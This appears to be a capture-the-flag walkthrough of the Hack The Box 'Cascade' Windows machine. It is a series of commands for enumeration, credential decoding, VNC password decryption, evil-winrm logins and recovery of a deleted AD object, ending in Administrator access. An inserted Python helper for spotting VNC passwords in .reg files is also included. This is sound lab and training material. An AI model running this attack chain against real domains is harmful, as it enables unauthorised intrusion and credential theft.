Cascade

HTB Windows

nmap -A -p- -oA mango 10.129.1.219 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mango 10.129.1.219

nmap -sU -O -p- -oA mango-udp 10.129.1.219

nikto -h 10.129.1.219:80

echo "10.129.205.71 cascade.local" | sudo tee -a /etc/hosts

rpcclient -U "" 10.129.205.71 -N

rpcclient -U "" 10.129.205.71 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]'

sudo ./rpcenum -e DUsersInfo -i 10.129.205.71

GetNPUsers is used when you have usernames but no passwords. We found nothing, though.

python3 /opt/impacket/examples/GetNPUsers.py cascade.local/ -no-pass -usersfile users

We run the following with the smbclient and smbmap tools:

smbmap -H 10.129.205.71

smbclient -L 10.129.205.71 -N

ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local"

ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local" -A 20

echo "clk0bjVldmE=" | base64 -d; echo

rpcclient -U "" 10.129.205.71 -N -c "queryuser r.thompson"

crackmapexec smb 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'

It seems this user does not have remote access.

smbmap -H 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'

smbclient //10.129.205.71/Data -U 'r.thompson%rY4n5eva'

Since there are several directories, we mount the share locally:

sudo mkdir /mnt/smbmounted

sudo mount -t cifs //10.129.205.71/Data /mnt/smbmounted -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw

To avoid browsing directory by directory with cd .., cd directory, and so on:

cd /mnt/smbmounted

tree

cp "/mnt/smbmounted/IT/Email Archives/Meeting Notes June 2018.html" index.html

We view what is in index.html. The user

pushd /mnt/smbmounted /mnt/smbmounted ~/Desktop/boxes/cascade/content

tree

cp "/mnt/smbmounted/IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log" .

cat ArkAdRecycleBin.log

We see the file VNC Install.reg.

grep -i "Ark" users

file "VNC Install.reg"

To convert it from hexadecimal to a string:

echo "6b,cf,2a,4b,6e,5a,ca,0f" | tr -d ',' | xxd -ps -r > password
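To make that hex-to-bytes step reusable when auditing files pulled from a share, here is an added Python example (not part of the original writeup) that parses a Windows .reg export, including the backslash line continuations exports use for long hex values, and flags any VNC key that stores a binary Password value. The .reg text below is constructed for the example and its bytes are made up, not the value from the box; the file is assumed to be already decoded to text.

```python
import re

# Constructed sample modelled on a TightVNC "VNC Install.reg" export; the hex
# bytes are made up for this example and are not the value from the box.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"Password"=hex:01,23,45,67,\
  89,ab,cd,ef
"UseVncAuthentication"=dword:00000001
'''

KEY_LINE = re.compile(r'^\[(.+)\]$')
VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"=(?P<val>.*)$')

def parse_reg(text):
    """Parse a decoded .reg export into {key_path: {value_name: value}}.
    hex:/hex(n): values become bytes, dword: becomes int, strings stay str."""
    # A trailing backslash means the value continues on the next line.
    joined = []
    for line in text.splitlines():
        if joined and joined[-1].endswith('\\'):
            joined[-1] = joined[-1][:-1] + line.strip()
        else:
            joined.append(line.rstrip())
    result, current = {}, None
    for line in joined:
        m = KEY_LINE.match(line)
        if m:
            current = result.setdefault(m.group(1), {})
            continue
        m = VALUE_LINE.match(line)
        if not m or current is None:
            continue
        name, val = m.group('name'), m.group('val')
        if val.startswith('hex'):          # hex: or hex(type):
            current[name] = bytes.fromhex(val.partition(':')[2].replace(',', ''))
        elif val.startswith('dword:'):
            current[name] = int(val[6:], 16)
        else:
            current[name] = val.strip('"')
    return result

def find_vnc_password_blobs(text):
    """Return (key_path, raw_bytes) for every VNC key holding a binary Password
    value: the same bytes the tr/xxd pipeline above writes to the password file."""
    return [(key, vals['Password']) for key, vals in parse_reg(text).items()
            if 'vnc' in key.lower() and isinstance(vals.get('Password'), bytes)]
```

Run over exports collected from a share review, a non-empty result marks a file that should not be sitting there and whose stored VNC password should be rotated.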

https://github.com/jeroennijhof/vncpwd

./vncpwd ../password

crackmapexec smb 10.129.205.71 -u ../users -p 'sT333ve2'

crackmapexec smb 10.129.205.71 -u 's.smith' -p 'sT333ve2'

evil-winrm -i 10.129.205.71 -u 's.smith' -p 'sT333ve2'

net user

net user s.smith

smbmap -H 10.129.205.71 -u 's.smith' -p 'sT333ve2'

cd C:\Shares\Audit

smbclient '//10.129.205.71/Audit$' -U 's.smith%sT333ve2'

download C:\Shares\Audit\CascAudit.exe

mv C:\Shares\Audit\CascAudit.exe ../CascAudit.exe

To download all the files from the share in smbclient:

prompt off
recurse on
mget *

cd DB

file Audit.db

sqlite3 Audit.db

.tables

select * from Ldap;

echo "BQO5.." | base64 -d > arksvc_passwd

We find the executable CascAudit.exe.

We open it (CascAudit.exe) with JetBrains dotPeek.

We open Crypto.dll with JetBrains dotPeek.

We go to CyberChef and enter the key and the IV.

Credentials -> arksvc:w3lc0meFr31nd

evil-winrm -i 10.129.205.71 -u 'arksvc' -p 'w3lc0meFr31nd'

whoami /priv

Get-ADObject -Filter 'Deleted -eq $true' -IncludeDeletedObjects -Properties *

echo "YmFDVDN.." | base64 -d

evil-winrm -i 10.129.205.71 -u 'Administrator' -p 'baCT3r1aN00dles'

© 2025 Cu3rv0x